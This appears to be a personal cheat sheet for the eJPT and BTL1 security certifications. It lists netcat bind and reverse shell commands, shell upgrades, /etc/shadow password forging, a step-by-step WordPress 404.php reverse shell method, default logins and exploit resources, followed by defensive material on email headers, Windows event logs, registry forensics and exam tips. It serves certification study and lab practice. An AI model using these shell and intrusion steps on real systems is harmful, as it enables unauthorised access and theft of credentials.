• SMB - smbclient -L 192.168.0.1 - List shares
• SMB (Connect to share) smbclient //192.168.0.1/share -U user
  • Guest login: U: Guest P: Guest
• SQL - mysql -h 192.168.0.1 -u username -ppassword database
• Netcat
  • -l = listen
    -p = LOCAL port (for listeners/reverse shells)
    -n = no dns lookup
    -v = verbose
    -u = udp
    -e = execute command
     Bind shell (Ran on victim): nc.exe -lnvp PORT -e cmd.exe
     Bind shell (Ran on attacker): nc 192.168.0.1 PORT
     Reverse shell: nc -lvnp PORT
• RDP - xfreerdp /u:username /p:password /v:192.168.0.1:PORT
• FTP - ftp 192.168.0.1 port (Will prompt for username and then prompt for password)
  • Anonymous login: U: Anonymous P: (NONE, just press enter)
• SSH - ssh user@192.168.0.1 OR ssh -i key_file user@192.168.0.1
• Telnet - telnet 192.168.0.1 PORT

• ip a | grep inet - Your machine's IPs (UNIX only)
• ip a | grep eth1 - Eth1 (Outward-facing Interface)
• ipconfig /all | findstr /i ipv4 Your machine's IP (Windows only)
• python -c 'import pty;pty.spawn("/bin/bash")' - Stable shell generation
• /bin/bash -i - Interactive bash shell generation
• sudo -l - Show binaries that can be ran as root
• chmod ### file   #1 = Owner permissions. #2 = Group permissions. #3 = "World" permissions. 7 = Total, 4 = Read, 2 = Write, 1 = Execute
  • chmod +r/+w/+x file - Make file readable/writeable/executable
  • chmod 777 file - Set file permissions to 777
  • chmod +t file - Set sticky bit
• openssl passwd -1 -salt abc password - Generate a password for /etc/shadow (When /etc/shadow is modifiable, weak permissions)
• SQL Commands
  • mysql -u username -ppassword -e "See below for commands" - Generic sql command, use -h when using remote access
  • mysql -u username -ppassword -d database_name -e "See below for commands" - Generic sql command with database selection
  • show databases; - List databases
  • use database_name; - Select database
  • show tables; - Show tables within selected database
  • select * from table_name; - Select all rows from table
  • The above commands can be combined, as such: use database_name; select * from table_name;
• PowerShell
  • Searching recursively for file name: Get-ChildItem -Path C:\ -Include *FILENAME.EXT* -File -Recurse -ErrorAction SilentlyContinue
  • MD5Sum equivalent: Get-FileHash -Algorithm MD5 -Path FILENAME.EXT
  • List network connections: Get-NetTCPConnection
• /etc/hosts - Local host resolution file, can be edited/viewed with cat/vim/nano

Initiating connections

• Bind shell - Attacker → Target (Target must be running a listener, call is made from the attacker)
• Reverse shell - Target → Attacker (Attacker must be running a listener, call is made from the target)

Common exploitable ports

• 1524 - Ingreslock (UNIX) Connect via netcat
• 139/445 - SMB (Enumerate Shares, brute force users/passwords, try anonymous logins, check for EternalBlue vulnerability (Windows SMBv1 without MS17-010 patch)
• 5985/5986 - winrm

Common Unix password hash types (/etc/shadow)

• $1 - MD5
• $2 - Blowfish
• $5 - SHA-256
• $6 - SHA-512

XSS (Cross-Site Scripting)

(Hover over each part for an explanation)

SQL Injection example:

DNS

• A - Hostname → IPv4
• AAAA - Hostname/Domain → IPv6
• NS - Domain → Nameserver
• MX - Domain → Mailserver
• CNAME - Hostname ←→ Hostname
• TXT - Text Record
• HINFO - Host Information
• SOA - Start of Authority (Domain Authority)
• SRV - Service Records
• PTR - IP → Hostname

Change Management Systems (CMS)

• Drupal
  • Drupalgeddon
• WordPress
  • WPScan(Scanner to find vulnerabilities)
  • Wordpress reverse shell
    1. Gain access to admin panel (Use WpScan)
    2. Appearance → Theme File Editor → 404.php
    3. Replace content of 404.php with shell ENSURE THAT THE SHELL IS FOR THE OS OF THE WordPress MACHINE, ENSURE THAT YOU'VE CHANGED THE VARIABLES INSIDE OF THE REVERSE SHELL CODE (your IP, your listening port) → Update File
    4. Start a netcat listener (nc -lvnp PORT), or use multi/handler in msfconsole to handle the connection from the target
    5. Run the 404.php by calling it from the web browser. Keep note of target's wordpress theme. You can call it as such: http://TARGET:PORT/wordpress/wp-content/themes/THEMENAME/404.php
    6. If necessary, you can (possibly) access the sql database on the server
       • Open wp-config.php, the database information (user/password) may be shown
       • mysql -u root -pPASSWORD -h 192.168.0.1

Red Team Methodology (Hover for explanations)

Default logins user/password

• Jenkins - admin/admin
• Wordpress - admin/password

• Bypass security restrictions in misconfigured systems: GTFOBins
• Exploit listings: exploit-db
• Reverse shell cheat sheet: pentestmonkey
• Reverse shell generator: Revshells
• NMAP scripts: nmap.org
• Meterpreter commands: stationx.net

• EJPT Zero to Hero Playlist (OvergrownCarrot): YouTube
• TryHackMe rooms
  • Blue
  • Blog
  • Deja Vu
  • GoldenEye
  • Anthem
  • Crack the hash
  • Brute It
  • Mr Robot CTF
• Test-Taking Tips:
  • SAVE EVERYTHING ON YOUR LOCAL COMPUTER!!! - The eJPT crashed 4 times for me, it doesn't save as much as a text file and you will lose all files/changes made on the lab environment
  • Don't fall down rabbit holes! If something is starting to take longer than 20-30 minutes, take a look at something else and maybe come back to it later
  • Organize your scan results and notes. I personally organized it by host so that all my information per host was in one place
  • There are typically multiple ways to do things. If you're better at using one tool to enumerate, go for it. If you know one exploitation method better than another, use it
  • This website contains most of what you need to know about the tools/methods you can use in the lab

Tools

• AnyRun
• Phishtool (Analysis Tab)

Info

Parts of an Email

• Header
  • From - Shows the sender's email address
  • To - Shows the recipient's email address
  • Date - Shows the date the email was sent
  • Received - Shows various information about intermediary severs and the date when the message was processed
  • Reply-to - Shows a reply address
  • subject - Shows the subject
  • message-ID - Shows a unique identification for the message
  • message body - containing the message, separated from the header by a line break
  • Disclaimer: There are also other fields that may be present, such as 'X' fields, which may include helpful fields such as "X-DestIP"
• Body

• System logs: Records events associated with the Operating System segments
  • Hardware changes
  • Device drivers
  • System changes
• Security logs: Records events connected to logon and logoff activities
• Application logs: Records events related to logon and logoff activities on a device
• Directory Service Events: Active Directory changes and activities, mainly on domain controllers
• File Replication Service Events: Records events associated with Windows SErvers during the sharing of Group Policies and logon scripts to domain controllers
• DNS Event Logs: D servers use these logs to record domain events to map out
• Custom Logs: Events are logged by applciations that require custom data storage. This allows applications to control the log size or attach other parameters (Such as access control lists)

• Event log types

  • Error: Event that indicates a significant problem such as loss or data/loss of functionality
  • Warning: Event that is not necessarily significant, but may indicte future problems (Ex. Low disk space)
  • Information: Event that describes the successful operation of an application, driver, or service
  • Success Audit: Event that records an audited security access attempts that is successful (Ex. Successful attempt to log on)
  • Failure Audit: An event that records an audited security access attempt that fails (Ex. User tries to access a network drive and fails)

Accessing Event Logs

• Event Viewer (GUI): Launch with eventvwr.msc
• Wevtutil.exe (CLI tool): wevtutil.exe /?
• Get-WinEvent (Powershell CMDlet): Get-WinEvent Documentation

Installation and running

Sysmon Event IDs

Cheat Sheet (Courtesy of TryHackMe): PDF

Registry Hives

• Located in C:\Windows\System32\Config
  • DEFAULT - Mounted on HKEY_USERS\DEFAULT
  • SYSTEM - Mounted on HKEY_LOCAL_MACHINE\SYSTEM
  • SECURITY - Mounted on HKEY_LOCAL_MACHINE\SECURITY
  • SOFTWARE - Mounted on HKEY_LOCAL_MACHINE\SOFTWARE
  • SAM - Mounted on HKEY_LOCAL_MACHINE\SAM
    • Transaction log: C:\Windows\System32\Config\SAM.LOG
• Located in C:\Users\username\AppData\Local\Microsoft\Windows
  • NTUSER.DAT (HIDDEN FILE) - Mounted on HKEY_CURRENT_USER (when a user logs in)
• Located in C:\Users\username
  • USRCLASS.DAT (HIDDEN FILE) - Mounted on HKEY_CURRENT_USER\Software\Classes
• Amcache Hive - C:\Windows\AppCompat\Programs\Amcache.hve

• OS Version - SOFTWARE\Microsoft\Windows NT\CurrentVersion
• Current control set - HKLM\SYSTEM\CurrentControlSet
  • Other control sets - HKLM\SYSTEM\ControlSet001 (other numbers)
• Last Known Good - SYSTEM\Select\LastKnownGood
• Computer Name - SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
• Time Zone Information - SYSTEM\CurrentControlSet\Control\TimeZoneInformation
• Network Interfaces (NICs)- SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
• Past Networks - SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Signatures\Managed AND Unmanaged
• Autostart Programs
  • NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run
  • NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\RunOnce
  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
• Services - SYSTEM\CurrentControlSet\Services
• SAM - SAM\Domains\Account\Users
• Recent Files - NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs
• Office Recent Files - NTUSER>DAT\Software\Microsoft\Office

Tools

• KAPE - Live data acquisition and analysis tool to acquire registry data
• Autopsy - Acquire data from both live systems and/or disk images
• Regripper - Takes a registry hive as input and outputs a report that extracts data from some of the forensically important keys and values in that hive
• (EZTools) Registry Explorer - Can load multiple hives and add data from transaction logs into the hive

• jq - JSON parser

• Event IDs (ultimatewindowssecurity.com)
• VirusTotal

• The BTL1 test is very simple, don't overthink it. Although you have less time than the eJPT, there's also less questions and significantly less to do
• Get familiar with Splunk, Autopsy, and Wireshark.
  • Splunk - Know basic queries, know your fields, and know where to find your dashboards
  • Autopsy - Know your general locations for important artifacts (File downloads, shellbags, etc.)
  • Wireshark - Know basic queries, general syntax for wireshark is very important for quick and concise searches
• Make sure you're familiar with Windows file structures! Get in the mind of the attacker, some generic locations where they would "hide" files. BTL1 is intentionally for beginners, they're not trying to trick you or mislead you
• If you don't know what something is... Google it! There are many red and blue tools that we never ended up using in this course, so if something is unfamiliar to you, look it up
• Don't fall down a rabbit hole. The eJPT had some rabbit holes here and there deliberately intended to waste your time, BTL1 has artifacts that are what you're looking for, and then some which are literally artifacts of when they were setting up the test, which is just a fault on Security Blue Team